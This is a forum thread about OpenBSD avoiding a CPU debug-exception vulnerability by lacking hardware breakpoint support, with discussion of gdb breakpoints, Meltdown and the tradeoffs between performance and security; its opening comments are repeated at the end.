This seems a bit too self-congratulatory to be technically meaningful. What feature did they not use?
From the thread history, it sounds like they provided no way for a userspace debugger to (ask the kernel to) set a hardware breakpoint on a section of memory. That means that when you use gdb and set a single breakpoint on some instruction, gdb must instead fall back on single-stepping the entire program until it gets there, incurring at least four context switches per instruction (program being debugged -> exception to kernel -> switch to gdb -> "nope, not there yet" -> kernel resumes the program for one more instruction). It does avoid the bug by not letting the CPU defer a debug exception until after a syscall (because the only mode you get for debug exceptions is the one that unconditionally delivers it after every instruction), but it also makes breakpoints basically unusable for large software.
First, this isn't an obscure, recent, or Intel-only feature. It's not like avoiding RDRAND or anything. Hardware breakpoints are common on basically all CPUs for exactly this reason.
Second, does anyone actually debug large programs using gdb on OpenBSD? It is hard for me to read this as saying "We're not vulnerable because we have so few production users that we can just not have standard development tools that work reasonably." I know OpenBSD is not the most popular OS, but I didn't think it was that unpopular....
I think the hardware breakpoint support is for breaking on memory accesses to a particular address. Setting a breakpoint on the execution of a particular opcode at a particular address is easier and can be done by just swapping in an "INT 3" instruction at the particular point with no overhead.
Hardware breakpoint support is also for execution and, oddly, the x86 IO port space reachable by the "in" and "out" instructions.
Using an int3 has some problems. It can be seen by the code, which may change behavior. For example, a self-checksum would fail. The int3 will affect all threads, while the hardware breakpoint can be made to affect just one thread.
Which is to say, no hardware support for watchpoints in gdb[1]? That seems like not such a great "feature"...
This is Theo being Theo. No one sane believes that if someone had come to OpenBSD with an implementation of this (very useful!) feature that they wouldn't have committed it. They just didn't get around to it.
[1] In which the fallback is, IIRC, to turn off access to the location at the mapping level and take a SIGSEGV on every access to the 4k region containing the address.
It's crazy that DragonFlyBSD took so little time to fix it. I can understand from Microsoft/Xen/Ubuntu to take only 1 day since they have so much people working/depending on it, but it shows great competence and dedication for such a "small" project as DF to solve it in 1 day. Respect.
Am I misreading this or are you saying that without hardware breakpoints you have to single step all the way through the program to the breakpoint location?
If so: that's a surprising and weird thing to say. Without hardware breakpoints, userspace debuggers work by overwriting the instruction at the target with an interrupting instruction, and then restoring it before resuming.
I'm trying to imagine how gdb breakpoints in OpenBSD would even work if they required single-stepping whole programs.
> gdb must instead fall back on single-stepping the entire program until it gets there
I don’t think it’s that bad. gdb can (and hopefully does) just replace the target instruction with INT3. IMO the worse implication is that gdb can’t use efficient data breakpoints.
Inefficient data breakpoints still seems like a dealbraker for an OS aiming to be as popular as Windows or Linux, but I can see how OpenBSD can avoid it and still have a good number of users.
Quicker google leads me to believe they suggest using ddb instead of gdb. I’ve seen variations on the following thread a few times. I,don’t,know,whether this answers your question or not.
Personally, I think it’s valuable to take advantage of new features. AVX512 can be dozens of times faster than scalar operations, and clhash is the fastest strongly universal string hash library. There’s no good reason to pass on these kinds of performance improvements.
I know these aren’t the features in question, but casually dismissing the benefits of CPU improvements doesn’t strike me as productive.
On the other hand, I can’t remember the last time any non-interpreted system I deployed for my own use was too slow, even on low-wattage hardware / smallest available cloud instances.
At some point, “rock solid” is more imporant than “N% faster”.
As hardware gets faster, stability is the dominant consideration for a larger percentage of deployments.
True. But, not implementing all intel CPU features "right away" would not be such a bad idea. As a security conscious OS environment, they're wise to not implement certain features until there is a proven need for them/or until there is mature understanding of the features. I for one choose Debian or OpenBSD for such needs. I don't need my firewall appliance(pf + OpenBSD) to be in a hurry to implement AVX512 for example.
I'd just pick one of many bleeding edge distributions for say a laptop.
I like performance. But. OpenBSD supports hardware versions a long way back. So you either break compatibility, ship more versions, or have to detect features on the fly, which works but has costs. On the other hand, if all x86_64 (amd64) supports a feature then it seems like a better bet.
Focusing on correctness and security isn't as popular or sexy as having the latest and greatest bleeding edge superfast stuff, until that stuff breaks and leaves your data vulnerable. But that's unpleasant, so it's easier to deflect than it is to question whether your goals should be adjusted.
That's not anywhere close to a prediction of Meltdown. Meltdown is a side-channel attack that can cross the user/kernel boundary. What Theo was predicting is that all chips are getting complex MMUs to the point that there are bugs in corner cases that could be exploited to create infiltration leaks. Side channel attacks aren't bugs, insofar as no one is really promising that you can't observe side channels.
But the observable out-of-order execution used by these chips that led to Meltdown is a bug. Proof: AMD chips aren't affected by it:
> The Meltdown vulnerability primarily affects Intel microprocessors,[52] but some ARM microprocessors are also affected.[53] The vulnerability does not affect AMD microprocessors.[19][54][55][56] Intel has countered that the flaws affect all processors,[57] but AMD has denied this, saying "we believe AMD processors are not susceptible due to our use of privilege level protections within paging architecture".[58]
Question: say you know 5 programming languages and 20 UI libraries. If tasked to write an application, you will attempt to use them all in the project?
That's fine, but not a great analogy. Because once you ship software, everybody has access to that tool.
No matter if you agree or disagree, Theo/OpenBSD made a engineering choice and did what they thought was the right choice for OpenBSD users. As fellow engineers, we should realize how difficult that is, and that the discussion deserves a bit more nuance, depth and respect.
From the thread history, it sounds like they provided no way for a userspace debugger to (ask the kernel to) set a hardware breakpoint on a section of memory. That means that when you use gdb and set a single breakpoint on some instruction, gdb must instead fall back on single-stepping the entire program until it gets there, incurring at least four context switches per instruction (program being debugged -> exception to kernel -> switch to gdb -> "nope, not there yet" -> kernel resumes the program for one more instruction). It does avoid the bug by not letting the CPU defer a debug exception until after a syscall (because the only mode you get for debug exceptions is the one that unconditionally delivers it after every instruction), but it also makes breakpoints basically unusable for large software.
First, this isn't an obscure, recent, or Intel-only feature. It's not like avoiding RDRAND or anything. Hardware breakpoints are common on basically all CPUs for exactly this reason.
Second, does anyone actually debug large programs using gdb on OpenBSD? It is hard for me to read this as saying "We're not vulnerable because we have so few production users that we can just not have standard development tools that work reasonably." I know OpenBSD is not the most popular OS, but I didn't think it was that unpopular....